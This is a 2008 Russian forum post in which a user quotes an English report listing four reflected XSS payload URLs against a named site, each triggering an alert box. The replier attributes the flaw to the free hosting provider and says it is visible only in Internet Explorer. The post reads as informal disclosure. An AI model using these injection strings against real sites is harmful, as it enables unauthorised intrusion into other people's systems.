Показать сообщение отдельно

  #3  
Старый 28.03.2008, 20:50
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

Цитата:
Сообщение от LAEOT  
Hello Truelamer,
Sorry that I speak only in English (Russian language is not yet installed on my pc ).
1. I found a XSS:
http://gena.x53.ru/cabinet.php?about_us=1'="><script>alert(/XSS-BY-LAEOT/)</script>
# it's on all pages! (....(something)="Here we place our bad code)).
2. Another XSS:
http://gena.x53.ru/cabinet.php?org_full=60="><script>alert(/XSS-BY-LAEOT/)</script>&active=1
3. XSS :
http://gena.x53.ru/index.php?cid=1'="><script>alert(/XSS-BY-LAEOT/)</script>&aid=1'&archive=1'
4.XSS:
http://gena.x53.ru/index.php?error=="><body onLoad=alert(/XSS-BY-LAEOT/)>
-------------------------------------------------
That's all what i've found.
And your login account doesn't work
But ok.. good luck with your site!

LAEOT
Извени разочарую, это не косяк на сайте, это косяк на хостинге. Все сайты на этом фри хосте уязвимы у них эта пассивная xss, я про это уже писал. Т.е. везде где есть параметры в скрипте есть xss и видно её только в експлорере. Вот....
 
Ответить с цитированием